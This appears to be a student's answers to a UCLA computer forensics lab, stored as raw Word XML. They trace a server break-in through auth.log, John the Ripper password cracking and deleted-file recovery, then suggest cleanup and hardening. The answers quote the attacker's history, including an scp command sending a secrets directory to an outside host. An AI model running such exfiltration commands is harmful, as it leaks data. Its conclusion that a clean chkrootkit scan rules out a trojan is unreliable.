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2D" w:rsidRPr="00F9402D" w:rsidRDefault="00F9402D" w:rsidP="00F9402D">
      <w:pPr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000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9402D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Computer Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="00F9402D" w:rsidRDefault="00F9402D" w:rsidP="00F9402D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F9402D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Created by: Peter A. H. Peterson and Dr. Peter Reiher, UCLA {pahp, reiher}@cs.ucla.edu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00F9402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2B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whether you think the server was indeed compromised</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="00F9402D" w:rsidRDefault="00F9402D" w:rsidP="00F940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if so, how? if not, what</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9402D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>actually</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F9402D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>happened?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00F940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give a blow-by-blow account if possible -- the more detail, the better!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="002B3A31" w:rsidRDefault="003722BE" w:rsidP="003722BE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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives us the information we need. The IP</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> address 193.252.122.1</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to hack three separate accounts</w:t>
      </w:r>
      <w:r w:rsidR="00040850" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trie</w:t>
      </w:r>
      <w:r w:rsidR="00040850" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d attacking accounts of john, Fr</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ed and finally succeed</w:t>
      </w:r>
      <w:r w:rsidR="00040850" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in cracking into mike’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="002B3A31" w:rsidRDefault="00040850" w:rsidP="003722BE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>Targets for attacker:</w:t>
      </w:r>
      <w:r w:rsidR="003722BE" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> john, fred, mike, jane and jake </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="002B3A31" w:rsidRDefault="00040850" w:rsidP="003722BE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>Compromised user(possible):</w:t>
      </w:r>
      <w:r w:rsidR="003722BE" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="002B3A31" w:rsidRDefault="003722BE" w:rsidP="003722BE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>Used john the ripper to crack the password of others by logging into currently compromised mike’s profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="002B3A31" w:rsidRDefault="00040850" w:rsidP="003722BE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>J</w:t>
      </w:r>
      <w:r w:rsidR="003722BE" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ohn the ripper has successfully brute forced the passwords for john, fred and jake</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003722BE" w:rsidRPr="00F9402D" w:rsidRDefault="003722BE" w:rsidP="003722BE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</w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00F94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whether you think the attacker accessed any sensitive information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="002B3A31" w:rsidRDefault="00B1469A" w:rsidP="00B1469A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>Yes,</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attacker has also managed to copy some data to his/her machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="002B3A31" w:rsidRDefault="00B1469A" w:rsidP="00B1469A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>Here is the proof from user jake’s .bash_history that the secrets files where compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="002B3A31" w:rsidRDefault="00B1469A" w:rsidP="00B1469A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color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scp -r /secrets .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="002B3A31" w:rsidRDefault="00B1469A" w:rsidP="00B1469A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color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="002B3A31" w:rsidRDefault="00B1469A" w:rsidP="00B1469A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color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scp -r secrets d000d@207.92.30.41   :~/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1469A" w:rsidRPr="00F9402D" w:rsidRDefault="00B1469A" w:rsidP="00B1469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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00F94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your recovery of any meaningful data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="000C762A" w:rsidP="0014474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 w:rsidR="00144746" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e2undel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00144746" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>softwa</w:t>
      </w:r>
      <w:r w:rsidR="00B87C2D">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>re was able to detect 179</w:t>
      </w:r>
      <w:r w:rsidR="00144746" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> files available for recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746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>|==================================================|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00B87C2D" w:rsidP="00144746">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>175369 inodes scanned, 179</w:t>
      </w:r>
      <w:r w:rsidR="00144746" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> deleted files found</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746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>user name | 1 &lt;12 h | 2 &lt;48 h | 3  &lt;7 d | 4 &lt;30 d | 5  &lt;1 y | 6 older</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746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>-------------+---------+---------+---------+---------+---------+--------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">root |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">|   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">11 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="002B3A31" w:rsidRDefault="00144746" w:rsidP="00144746">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1002 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 | </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">183 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0 |   </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00144746" w:rsidRPr="00F9402D" w:rsidRDefault="00144746" w:rsidP="0014474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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="00F9402D" w:rsidRDefault="00F9402D" w:rsidP="00F94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a discussion of what should be done before returning the system to production</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00F940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For example, is it good enough to delete the obvious files? Could the system be trojaned?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E40613" w:rsidRPr="002B3A31" w:rsidRDefault="00E40613" w:rsidP="00E40613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 xml:space="preserve">1. remove /home/jake/.elinks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E40613" w:rsidRPr="002B3A31" w:rsidRDefault="00E40613" w:rsidP="00E40613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>- the .el</w:t>
      </w:r>
      <w:r w:rsidR="000F3BFD">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">inks folder can be used </w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">as server for text based a text based browser </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRPr="002B3A31" w:rsidRDefault="00E40613" w:rsidP="00877C01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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00877C01" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">remove /secrets/other/newsecret.data file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRPr="002B3A31" w:rsidRDefault="00877C01" w:rsidP="00877C01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lastRenderedPageBreak/>
        <w:t>- added by the attacker by using</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRPr="002B3A31" w:rsidRDefault="00877C01" w:rsidP="00877C01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat secret3.data &gt;&gt; newsecret.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRPr="002B3A31" w:rsidRDefault="00877C01" w:rsidP="00877C01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat secret3.data &gt;&gt; newsecret.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRPr="002B3A31" w:rsidRDefault="00877C01" w:rsidP="00877C01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat secret2.data &gt;&gt; newsecret.data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E40613" w:rsidRPr="002B3A31" w:rsidRDefault="00877C01" w:rsidP="00E4061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E40613" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reset the password of all users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877C01" w:rsidRDefault="00E40613" w:rsidP="00877C01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>- since t</w:t>
      </w:r>
      <w:r w:rsidR="004C4BE3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>he attacker might have possibly</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cracked the other users password</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> since he/she has access to the</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E40613" w:rsidRPr="00877C01" w:rsidRDefault="00E40613" w:rsidP="00877C01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00877C01">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a full chkrootkit scan</w:t>
      </w:r>
      <w:r w:rsidR="00D637F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the disk showed there were </w:t>
      </w:r>
      <w:r w:rsidRPr="00877C01">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no rootkits or other known malware infections in the disk</w:t>
      </w:r>
      <w:r w:rsidR="00D969BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, so the system could not be trojaned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9402D" w:rsidRPr="002B3A31" w:rsidRDefault="00F9402D" w:rsidP="00E406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recommendations as to how they can keep this from happening again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D0A" w:rsidRPr="002B3A31" w:rsidRDefault="00CF7D0A" w:rsidP="00CF7D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0054167B" w:rsidRDefault="0054167B" w:rsidP="00CF7D0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Primary suggestions would include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054167B" w:rsidRPr="002B3A31" w:rsidRDefault="0054167B" w:rsidP="0054167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FB6377">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Incorporating shadow file requiring higher user privileges for read access is a good idea.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054167B" w:rsidRDefault="0054167B" w:rsidP="00CF7D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E412C1" w:rsidRDefault="0054167B" w:rsidP="00CF7D0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2</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D0A" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="004631E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A stronger password requirement, along with length restrictions would help.</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D0A" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Having noted the point of entry, the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="008D6433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> was because of easily cracked</w:t>
      </w:r>
      <w:r w:rsidR="00E412C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D0A" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> password used by mike and further john th</w:t>
      </w:r>
      <w:r w:rsidR="00E412C1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e ripper was penetrable by using brute force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D0A" w:rsidRPr="002B3A31" w:rsidRDefault="0054167B" w:rsidP="00CF7D0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3</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D0A" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.   Absence of shadow file and using same sal</w:t>
      </w:r>
      <w:r w:rsidR="00C376B1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t for hashing all user passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D0A" w:rsidRPr="002B3A31" w:rsidRDefault="00CF7D0A" w:rsidP="00CF7D0A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ab/>
        <w:t xml:space="preserve">ls -l ~/sda1/etc/passwd </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D0A" w:rsidRPr="002B3A31" w:rsidRDefault="00CF7D0A" w:rsidP="00CF7D0A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-rw-r--</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r--</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 root root 1519 Sep 10 04:22 /users/sc530cb/sda1/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF7D0A" w:rsidRPr="00F9402D" w:rsidRDefault="00FC1861" w:rsidP="00CF7D0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showed</w:t>
      </w:r>
      <w:r w:rsidR="00CF7D0A" w:rsidRPr="002B3A31">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the hashed passwords are available in read access for virtually anyone who got access to the system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001943B4" w:rsidRDefault="00F9402D" w:rsidP="00194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F9402D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>an estimate on how long this assignment took you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00542FF2" w:rsidRPr="001943B4" w:rsidRDefault="001943B4" w:rsidP="001943B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sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="009E7C6F" w:rsidRPr="001943B4">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hours or so.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00542FF2" w:rsidRPr="0019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1A09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B7A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2D"/>
    <w:rsid w:val="00040850"/>
    <w:rsid w:val="000C762A"/>
    <w:rsid w:val="000F3BFD"/>
    <w:rsid w:val="00144746"/>
    <w:rsid w:val="001943B4"/>
